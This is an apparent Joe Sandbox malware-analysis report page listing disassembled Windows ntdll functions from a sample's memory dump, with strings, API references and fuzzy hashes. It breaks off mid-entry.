                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                        • API String ID: 3446177414-1700792311
                                                                                        • Opcode ID: 691e278bbfbe6277a2bd790e2bcb3a60b00ffb0beb69321b373ce6dbdd1586c6
                                                                                        • Instruction ID: b56456bf2a3b015645bbed8d2c9a6868c1cd27c4494aba7032a9e77864ddf0aa
                                                                                        • Opcode Fuzzy Hash: 691e278bbfbe6277a2bd790e2bcb3a60b00ffb0beb69321b373ce6dbdd1586c6
                                                                                        • Instruction Fuzzy Hash: 75D1CD3150068ADFDB22EF68C454AAEFBF1FF59714F088049F646DB252CB349A81CB54
                                                                                        Function 017C29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01802624
                                                                                        • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018024C0
                                                                                        • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01802506
                                                                                        • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01802409
                                                                                        • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01802412
                                                                                        • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01802602
                                                                                        • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018022E4
                                                                                        • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01802498
                                                                                        • RtlpResolveAssemblyStorageMapEntry, xrefs: 0180261F
                                                                                        • @, xrefs: 0180259B
                                                                                        • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018025EB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                        • API String ID: 0-4009184096
                                                                                        • Opcode ID: 35c7cd39b25cbabbd6ec771a890c6446d837c6cf0b7d98b46b18c50bef611670
                                                                                        • Instruction ID: 186d12e938e221332168dfc9fe5f307cae00737989f2ef05726712511ba0c0fc
                                                                                        • Opcode Fuzzy Hash: 35c7cd39b25cbabbd6ec771a890c6446d837c6cf0b7d98b46b18c50bef611670
                                                                                        • Instruction Fuzzy Hash: F8025DF1D002299BDB71DB54CC84BDAF7B8AB54704F4141EEA609A7282EB709F84CF59
                                                                                        Function 01838B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                        • API String ID: 0-2515994595
                                                                                        • Opcode ID: b079cff3acc3a8fd54cbfb578bc70ef18e5852782a1decbe2b2a23e24beb0626
                                                                                        • Instruction ID: 422203e4046b946a600ce342c8bb81e0667865277815485523e3defee7772c1c
                                                                                        • Opcode Fuzzy Hash: b079cff3acc3a8fd54cbfb578bc70ef18e5852782a1decbe2b2a23e24beb0626
                                                                                        • Instruction Fuzzy Hash: 8451EF711183069BC329CF188848BABBBECEFD5344F180A2DB999C3245E770D609CBD2
                                                                                        Function 0178645D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlDebugPrintTimes.NTDLL ref: 0178656C
                                                                                          • Part of subcall function 017865B5: RtlDebugPrintTimes.NTDLL ref: 01786664
                                                                                          • Part of subcall function 017865B5: RtlDebugPrintTimes.NTDLL ref: 017866AF
                                                                                        Strings
                                                                                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 017E9A2A
                                                                                        • LdrpInitShimEngine, xrefs: 017E99F4, 017E9A07, 017E9A30
                                                                                        • apphelp.dll, xrefs: 01786496
                                                                                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017E99ED
                                                                                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 017E9A01
                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 017E9A11, 017E9A3A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                        • API String ID: 3446177414-204845295
                                                                                        • Opcode ID: fe96f543b6cdfb5ae21071c85bb249b2d35ba754428ca6a8d2018cfdf2810ed1
                                                                                        • Instruction ID: 4b51ad07b0b7a532382c3a53914e0d43fadfea0961489d00612ea30b44f7ed84
                                                                                        • Opcode Fuzzy Hash: fe96f543b6cdfb5ae21071c85bb249b2d35ba754428ca6a8d2018cfdf2810ed1
                                                                                        • Instruction Fuzzy Hash: 5751B271248304AFD721EF28D855BABF7E4EF88748F10092DFA5597265D630EA44CB92
                                                                                        Function 018189B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • VerifierDlls, xrefs: 01818CBD
                                                                                        • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01818A67
                                                                                        • AVRF: -*- final list of providers -*- , xrefs: 01818B8F
                                                                                        • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01818A3D
                                                                                        • HandleTraces, xrefs: 01818C8F
                                                                                        • VerifierDebug, xrefs: 01818CA5
                                                                                        • VerifierFlags, xrefs: 01818C50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                        • API String ID: 0-3223716464
                                                                                        • Opcode ID: 8223612db522a4ce712eee17928c999a04e94f8f2cecc87b125e880985948f8d
                                                                                        • Instruction ID: db89ab7744d3b2062286a57ae94b55f5c21f31bf0471a90ab9b6c44331d9d551
                                                                                        • Opcode Fuzzy Hash: 8223612db522a4ce712eee17928c999a04e94f8f2cecc87b125e880985948f8d
                                                                                        • Instruction Fuzzy Hash: EC9126B3A41702AFD721EF6CC891B5AB7ACBB95B14F440518FA45EB249C7309F00CB92
                                                                                        Function 017B245A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • LdrpDynamicShimModule, xrefs: 017FA998
                                                                                        • apphelp.dll, xrefs: 017B2462
                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 017FA9A2
                                                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 017FA992
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                        • API String ID: 0-176724104
                                                                                        • Opcode ID: fd10c9ab3505afb11a798274ac92914dfc7469096a5477f6a7c100b053088000
                                                                                        • Instruction ID: 9e9fc4a28081b489c366faad7e6b581cfeec0f788a8fe95f6e6028afb36232fe
                                                                                        • Opcode Fuzzy Hash: fd10c9ab3505afb11a798274ac92914dfc7469096a5477f6a7c100b053088000
                                                                                        • Instruction Fuzzy Hash: 67316C75610201ABDB31EF5DD884E6FF7B4FB80B00F25006DEA04AB345D770AA45CB40
                                                                                        Function 017C63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                        • API String ID: 0-792281065
                                                                                        • Opcode ID: 4dddcbbbffd427a5c95b41190f57b65981df5e58a38a61aefc31eeaaf8f08548
                                                                                        • Instruction ID: 1276a95d85ec0c85eaff2984f4ffcef24f758cd0e0fd5357ee88197a1f6551b5
                                                                                        • Opcode Fuzzy Hash: 4dddcbbbffd427a5c95b41190f57b65981df5e58a38a61aefc31eeaaf8f08548
                                                                                        • Instruction Fuzzy Hash: BF911670B407199BDB26EF58DC89BAEFBA1AF50B14F14016CEA10A73C5D7709B01CB91
                                                                                        Function 017C2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01802178
                                                                                        • RtlGetAssemblyStorageRoot, xrefs: 01802160, 0180219A, 018021BA
                                                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0180219F
                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01802180
                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018021BF
                                                                                        • SXS: %s() passed the empty activation context, xrefs: 01802165
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                        • API String ID: 0-861424205
                                                                                        • Opcode ID: 453a00a1f50fe9f49715da045cfe33f02d90a2fb068d4ee73e759b7cec1dfe21
                                                                                        • Instruction ID: 0d5dcc37e4738e394b2a7fb7f8c65bcc18c4a0b4a952e4071d276e6649957d79
                                                                                        • Opcode Fuzzy Hash: 453a00a1f50fe9f49715da045cfe33f02d90a2fb068d4ee73e759b7cec1dfe21
                                                                                        • Instruction Fuzzy Hash: 32310B76B40219B7FB229A998C99F6ABB79DB54F50F05006DBB04F7141D2B0AB01C6A1
                                                                                        Function 017CC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01808181, 018081F5
                                                                                        • LdrpInitializeProcess, xrefs: 017CC6C4
                                                                                        • Loading import redirection DLL: '%wZ', xrefs: 01808170
                                                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 018081E5
                                                                                        • LdrpInitializeImportRedirection, xrefs: 01808177, 018081EB
                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 017CC6C3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                        • API String ID: 0-475462383
                                                                                        • Opcode ID: dab4894ac8d760d32c423323f02f3448b66aa62386aae7db3941784e13d64b2c
                                                                                        • Instruction ID: 6ba8f23757e1a8a85c5371151c2761ced6d67799e9cdf9b7095b9cdc45ff1f79
                                                                                        • Opcode Fuzzy Hash: dab4894ac8d760d32c423323f02f3448b66aa62386aae7db3941784e13d64b2c
                                                                                        • Instruction Fuzzy Hash: 213115B16443469FC215EF2CDD49E1AF7D4EF94B14F00056CF944AB295E720EE04CBA2
                                                                                        Function 017A0770 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                        • API String ID: 0-4253913091
                                                                                        • Opcode ID: 8a142075d22f5c344494949555c8008143cf61f62ba03b14e0345fb2547d7c08
                                                                                        • Instruction ID: 131777597f6c9aeeb8ae7cd073a10295ddb6ea276919f4595e2b4b18ec14d8bc
                                                                                        • Opcode Fuzzy Hash: 8a142075d22f5c344494949555c8008143cf61f62ba03b14e0345fb2547d7c08
                                                                                        • Instruction Fuzzy Hash: 27F1BE74600606DFEB15CF68C894B6AFBF5FF84300F5486A8E5169B391D734EA81CB91
                                                                                        Function 017B0BCB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        • LdrpCheckModule, xrefs: 017FA117
                                                                                        • Failed to allocated memory for shimmed module list, xrefs: 017FA10F
                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 017FA121
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                        • API String ID: 3446177414-161242083
                                                                                        • Opcode ID: 8619f9de81dac7e7e2769558b65132bbb698afa9628e89c52607318f1884926a
                                                                                        • Instruction ID: 0a7363b1304584fa80dd9a79dc3c59007d39cdbae372c5a6ed8d2954f32227c5
                                                                                        • Opcode Fuzzy Hash: 8619f9de81dac7e7e2769558b65132bbb698afa9628e89c52607318f1884926a
                                                                                        • Instruction Fuzzy Hash: 4E718A71A002069BDB25EF6CC985BBFF7B4EB88704F14446DE906AB355E734AA81CB50
                                                                                        Function 017CC720 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 018082DE
                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 018082E8
                                                                                        • Failed to reallocate the system dirs string !, xrefs: 018082D7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                        • API String ID: 3446177414-1783798831
                                                                                        • Opcode ID: 3c14463bd9e56c1b84dde3324732999c676069b23dfbd09f7d705fa18229ae1e
                                                                                        • Instruction ID: 0cdc558da4beae4c2f49c5474cf51f6baad59d87f76cd0ec0c469cdda50edfba
                                                                                        • Opcode Fuzzy Hash: 3c14463bd9e56c1b84dde3324732999c676069b23dfbd09f7d705fa18229ae1e
                                                                                        • Instruction Fuzzy Hash: 5B4102B1944305ABC722EB68DC48B5BBBE8EF94B54F10492EF948D7295E730D900CB92
                                                                                        Function 01814755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01814899
                                                                                        • LdrpCheckRedirection, xrefs: 0181488F
                                                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01814888
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                        • API String ID: 3446177414-3154609507
                                                                                        • Opcode ID: fc71b5e7fecec430933b27e4a4de4a0597f46984db360a26d6a49026d3212adf
                                                                                        • Instruction ID: 9ebadc0f0a0be3fd78143a923202b5cb2603f1b7ac3250b31daf65ed3d0f6809
                                                                                        • Opcode Fuzzy Hash: fc71b5e7fecec430933b27e4a4de4a0597f46984db360a26d6a49026d3212adf
                                                                                        • Instruction Fuzzy Hash: 3341E273A042558FCB22DF1DD840A26BBECAF49B54F090A6DED49D7319E730DA00CB81
                                                                                        Function 017D096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 017D2DF0: LdrInitializeThunk.NTDLL ref: 017D2DFA
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017D0BA3
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017D0BB6
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017D0D60
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017D0D74
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 1404860816-0
                                                                                        • Opcode ID: d06032bfb85dc90e3f7037a5eee9e5fdab1c29d705414ce17dd36187084020a5
                                                                                        • Instruction ID: 93b4033f54ffeb3352e9456e7684389de2f9e3d6ead577c080fc3f5fe2247a6c
                                                                                        • Opcode Fuzzy Hash: d06032bfb85dc90e3f7037a5eee9e5fdab1c29d705414ce17dd36187084020a5
                                                                                        • Instruction Fuzzy Hash: 75427E71900719DFDB61CF28C884BAAB7F4FF48314F1445AAE989DB246D770AA84CF61
                                                                                        Function 0186B16B Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID:
                                                                                        • API String ID: 3446177414-0
                                                                                        • Opcode ID: d4c227601d3cefdcb9cb4ad0a1954d31480acfac02afa7379a3309482a4cfdb4
                                                                                        • Instruction ID: 72dfc34a277677349273c8f875422c950c020f4d27409e84dd63dde8ac510021
                                                                                        • Opcode Fuzzy Hash: d4c227601d3cefdcb9cb4ad0a1954d31480acfac02afa7379a3309482a4cfdb4
                                                                                        • Instruction Fuzzy Hash: 8EF10572F006158BCB18CFACC99467EFBF9AF88314B19416ED856DB381E634EA41CB50
                                                                                        Function 017904E5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 153timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        • kLsE, xrefs: 01790540
                                                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0179063D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
